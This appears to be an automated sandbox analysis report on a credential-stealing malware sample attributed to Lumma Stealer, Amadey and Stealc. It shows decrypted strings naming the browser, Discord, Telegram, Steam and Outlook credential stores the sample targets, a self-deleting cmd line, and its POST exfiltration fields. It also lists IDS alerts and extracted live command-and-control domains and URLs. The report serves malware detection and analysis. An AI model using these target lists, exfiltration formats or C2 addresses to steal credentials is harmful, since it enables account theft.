Source: 26.0.num.exe.860000.0.unpack String decryptor: vcruntime140.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: \Temp\
Source: 26.0.num.exe.860000.0.unpack String decryptor: .exe
Source: 26.0.num.exe.860000.0.unpack String decryptor: runas
Source: 26.0.num.exe.860000.0.unpack String decryptor: open
Source: 26.0.num.exe.860000.0.unpack String decryptor: /c start
Source: 26.0.num.exe.860000.0.unpack String decryptor: %DESKTOP%
Source: 26.0.num.exe.860000.0.unpack String decryptor: %APPDATA%
Source: 26.0.num.exe.860000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 26.0.num.exe.860000.0.unpack String decryptor: %USERPROFILE%
Source: 26.0.num.exe.860000.0.unpack String decryptor: %DOCUMENTS%
Source: 26.0.num.exe.860000.0.unpack String decryptor: %PROGRAMFILES%
Source: 26.0.num.exe.860000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 26.0.num.exe.860000.0.unpack String decryptor: %RECENT%
Source: 26.0.num.exe.860000.0.unpack String decryptor: *.lnk
Source: 26.0.num.exe.860000.0.unpack String decryptor: files
Source: 26.0.num.exe.860000.0.unpack String decryptor: \discord\
Source: 26.0.num.exe.860000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 26.0.num.exe.860000.0.unpack String decryptor: \Local Storage\leveldb
Source: 26.0.num.exe.860000.0.unpack String decryptor: \Telegram Desktop\
Source: 26.0.num.exe.860000.0.unpack String decryptor: key_datas
Source: 26.0.num.exe.860000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 26.0.num.exe.860000.0.unpack String decryptor: map*
Source: 26.0.num.exe.860000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 26.0.num.exe.860000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 26.0.num.exe.860000.0.unpack String decryptor: F8806DD0C461824F*
Source: 26.0.num.exe.860000.0.unpack String decryptor: Telegram
Source: 26.0.num.exe.860000.0.unpack String decryptor: Tox
Source: 26.0.num.exe.860000.0.unpack String decryptor: *.tox
Source: 26.0.num.exe.860000.0.unpack String decryptor: *.ini
Source: 26.0.num.exe.860000.0.unpack String decryptor: Password
Source: 26.0.num.exe.860000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 26.0.num.exe.860000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 26.0.num.exe.860000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 26.0.num.exe.860000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 26.0.num.exe.860000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 26.0.num.exe.860000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 26.0.num.exe.860000.0.unpack String decryptor: 00000001
Source: 26.0.num.exe.860000.0.unpack String decryptor: 00000002
Source: 26.0.num.exe.860000.0.unpack String decryptor: 00000003
Source: 26.0.num.exe.860000.0.unpack String decryptor: 00000004
Source: 26.0.num.exe.860000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 26.0.num.exe.860000.0.unpack String decryptor: Pidgin
Source: 26.0.num.exe.860000.0.unpack String decryptor: \.purple\
Source: 26.0.num.exe.860000.0.unpack String decryptor: accounts.xml
Source: 26.0.num.exe.860000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 26.0.num.exe.860000.0.unpack String decryptor: token:
Source: 26.0.num.exe.860000.0.unpack String decryptor: Software\Valve\Steam
Source: 26.0.num.exe.860000.0.unpack String decryptor: SteamPath
Source: 26.0.num.exe.860000.0.unpack String decryptor: \config\
Source: 26.0.num.exe.860000.0.unpack String decryptor: ssfn*
Source: 26.0.num.exe.860000.0.unpack String decryptor: config.vdf
Source: 26.0.num.exe.860000.0.unpack String decryptor: DialogConfig.vdf
Source: 26.0.num.exe.860000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 26.0.num.exe.860000.0.unpack String decryptor: libraryfolders.vdf
Source: 26.0.num.exe.860000.0.unpack String decryptor: loginusers.vdf
Source: 26.0.num.exe.860000.0.unpack String decryptor: \Steam\
Source: 26.0.num.exe.860000.0.unpack String decryptor: sqlite3.dll
Source: 26.0.num.exe.860000.0.unpack String decryptor: browsers
Source: 26.0.num.exe.860000.0.unpack String decryptor: done
Source: 26.0.num.exe.860000.0.unpack String decryptor: soft
Source: 26.0.num.exe.860000.0.unpack String decryptor: \Discord\tokens.txt
Source: 26.0.num.exe.860000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 26.0.num.exe.860000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 26.0.num.exe.860000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 26.0.num.exe.860000.0.unpack String decryptor: https
Source: 26.0.num.exe.860000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 26.0.num.exe.860000.0.unpack String decryptor: POST
Source: 26.0.num.exe.860000.0.unpack String decryptor: HTTP/1.1
Source: 26.0.num.exe.860000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 26.0.num.exe.860000.0.unpack String decryptor: hwid
Source: 26.0.num.exe.860000.0.unpack String decryptor: build
Source: 26.0.num.exe.860000.0.unpack String decryptor: token
Source: 26.0.num.exe.860000.0.unpack String decryptor: file_name
Source: 26.0.num.exe.860000.0.unpack String decryptor: file
Source: 26.0.num.exe.860000.0.unpack String decryptor: message
Source: 26.0.num.exe.860000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 26.0.num.exe.860000.0.unpack String decryptor: screenshot.jpg
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49986 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49991 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49992 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50025 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50059 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50066 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50073 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50093 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50117 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50125 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50126 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50144 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50145 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50150 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50152 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:50154 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50169 version: TLS 1.2
Source: Binary string: my_library.pdbU source: 996773cd54.exe, 0000000A.00000003.2771688785.0000000004EDB000.00000004.00001000.00020000.00000000.sdmp, 996773cd54.exe, 0000000A.00000002.2819953969.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 0000001A.00000000.2858043384.000000000088C000.00000008.00000001.01000000.00000012.sdmp, 996773cd54.exe, 0000001D.00000002.3005019658.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, 996773cd54.exe, 0000001D.00000003.2911813021.0000000004CBB000.00000004.00001000.00020000.00000000.sdmp, num.exe, 00000024.00000000.3066269323.000000000088C000.00000008.00000001.01000000.00000012.sdmp, num[1].exe.8.dr
Source: Binary string: my_library.pdb source: 996773cd54.exe, 0000000A.00000003.2771688785.0000000004EDB000.00000004.00001000.00020000.00000000.sdmp, 996773cd54.exe, 0000000A.00000002.2819953969.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 0000001A.00000000.2858043384.000000000088C000.00000008.00000001.01000000.00000012.sdmp, 996773cd54.exe, 0000001D.00000002.3005019658.0000000000CFC000.00000040.00000001.01000000.0000000E.sdmp, 996773cd54.exe, 0000001D.00000003.2911813021.0000000004CBB000.00000004.00001000.00020000.00000000.sdmp, num.exe, 00000024.00000000.3066269323.000000000088C000.00000008.00000001.01000000.00000012.sdmp, num[1].exe.8.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: CT1ROX8L8OCI432H.exe, 00000003.00000002.2412866418.00000000002C2000.00000040.00000001.01000000.00000006.sdmp, CT1ROX8L8OCI432H.exe, 00000003.00000003.2278913650.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, QEDBGN5ZBSJ2P7FMKVJ.exe, 00000022.00000003.3041419710.0000000004F70000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1003093001\21024c5511.exe Directory queried: number of queries: 1523
Source: firefox.exe Memory has grown: Private usage: 1MB later: 192MB

Networking

barindex
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:63035 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:60189 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:60398 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:60526 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:55259 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49932 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49943
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:60812 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:61576 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:60536 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:62846 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49980 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49986 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49991 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49992 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49993 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49994 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49997 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49996 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49999 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:58786 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:58816 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:53272 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:49900 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50004 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50003 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50013 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50007 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50014 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50015 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50000 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50020 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50029 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50031 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50041 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50042 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50047 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:64706 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:56553 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:51591 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50083 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:51497 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50077 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50088 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50084 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50092 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50086 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50095 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50093 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:50090 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50131 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49986 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49986 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49991 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49991 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50003 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50004 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50004 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50042 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50077 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50077 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:50083 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50083 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:50090 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:50095 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50093 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:50041 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: thumbystriw.store
